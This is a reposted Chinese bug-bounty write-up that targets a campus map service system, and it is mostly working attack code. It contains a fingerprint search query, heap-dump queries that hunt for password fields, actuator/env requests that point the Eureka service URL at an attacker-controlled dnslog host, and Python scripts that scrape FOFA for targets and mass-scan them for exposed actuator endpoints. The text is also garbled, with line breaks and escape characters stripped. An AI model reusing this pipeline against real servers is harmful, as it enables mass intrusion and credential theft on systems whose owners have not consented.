好文分享 - 记一次edusrc的漏洞挖掘

文章作者：Cobra文章链接: http://chiza.gitee.io/2022/02/28/%E8%AE%B0%E4%B8%80%E6%AC%A1edusrc%E7%9A%84%E6%8C%96%E6%8E%98/

app="校园地图服务系统"

select * from java.util.Hashtable$Entry x WHERE (toString(x.key).contains("password"))select * from java.util.LinkedHashMap$Entry x WHERE (toString(x.key).contains("password"))

POST /openapi/actuator/env HTTP/1.1Host: IPContent-Type: application/jsonContent-Length: 85
{"name":"eureka.client.serviceUrl.defaultZone","value":"http://your.dnslog.cn"}

POST /openapi/actuator/refresh HTTP/1.1Host: IPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0Content-Type: application/json

import requestsimport base64from lxml import etreeimport timesearch_data='"校园地图服务系统"'
headers={    'cookie':'fofa.cookie',}for Page_number in range(1,3):    url='https://fofa.info/result?page='+str(Page_number)+'&qbase64='    search_data_bs=str(base64.b64encode(search_data.encode("utf-8")), "utf-8")    urls=url+search_data_bs    #print(urls)    try:        print('正在爬取第' + str(Page_number) + '页')        result=requests.get(urls,headers=headers).content.decode('utf-8')        #print(result)        soup = etree.HTML(result)        ip_data=soup.xpath('//a[@target="_blank"]/@href')        ipdata='n'.join(ip_data)        print(ip_data)        with open(r'ip.txt', 'a+') as f:            f.write(ipdata+'n')            f.close()        time.sleep(0.5)    except Exception as e:        pass

payload='/openapi/actuator/env'for ip in open('ip.txt'):    ip=ip.replace('n','')    new_url=ip+payload    #print(new_url)    try:        result=requests.get(new_url).content.decode('utf-8')        code=requests.get(new_url).status_code        print("check_ip->"+ip)        if 'activeProfiles' in result and code==200:            print(('33[31m存在漏洞的URL->'),new_url)            print('33[0m')            with open(r'result.txt','a+') as f:                f.write(ip+'n')                f.close()        time.sleep(0.5)    except Exception as e:        pass